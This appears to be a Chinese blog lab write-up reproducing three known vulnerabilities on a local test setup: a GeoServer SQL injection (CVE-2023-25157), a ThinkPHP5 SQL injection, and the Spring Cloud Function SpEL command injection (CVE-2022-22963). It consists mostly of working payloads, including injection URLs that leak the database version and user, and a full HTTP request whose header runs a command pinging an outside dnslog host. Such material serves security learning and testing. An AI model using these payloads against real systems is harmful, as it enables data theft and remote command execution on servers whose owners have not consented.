geoserver SQL注入、Think PHP5 SQL注入、spring命令注入

文章目录

  • [一、geoserver SQL注入CVE-2023-25157](#一、geoserver SQL注入CVE-2023-25157)
  • [二、Think PHP5 SQL注入](#二、Think PHP5 SQL注入)
  • [三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)](#三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963))

一、geoserver SQL注入CVE-2023-25157

介绍GeoServer是一个开源的地理信息系统(GIS)服务器,用于发布、共享和管理地理空间数据和地图服务。它是一个基于Java的应用程序

访问127.0.0.1/geoserver

payload:http://127.0.0.1/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true

二、Think PHP5 SQL注入

think php是php开发框架

payload1:

bash 复制代码
http://127.0.0.1/index.php?ids[]=1&ids[]=2 # payload1,显示出用户名
http://127.0.0.1/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 # payload2,可以在调试页面找到数据库的账户和密码



thinkphp_gui_tools也是可以检测出该SQL注入漏洞的。

三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)

spring是一个java框架~

直接访问127.0.0.1:8080是一个错误页面。

直接发送下面的数据包:

php 复制代码
POST /functionRouter HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping sf4rrw.dnslog.cn")
Content-Type: text/plain
Content-Length: 8

test


相关推荐
枷锁—sha12 小时前
【SRC】SQL注入WAF 绕过应对策略(二)
网络·数据库·python·sql·安全·网络安全
天荒地老笑话么19 小时前
静态 IP 规划:掩码/网关/DNS 的正确组合
网络·网络协议·tcp/ip·网络安全
大方子2 天前
【PolarCTF】rce1
网络安全·polarctf
枷锁—sha2 天前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
聚铭网络2 天前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
darkb1rd2 天前
八、PHP SAPI与运行环境差异
开发语言·网络安全·php·webshell
世界尽头与你2 天前
(修复方案)基础目录枚举漏洞
安全·网络安全·渗透测试
枷锁—sha3 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1193 天前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20253 天前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信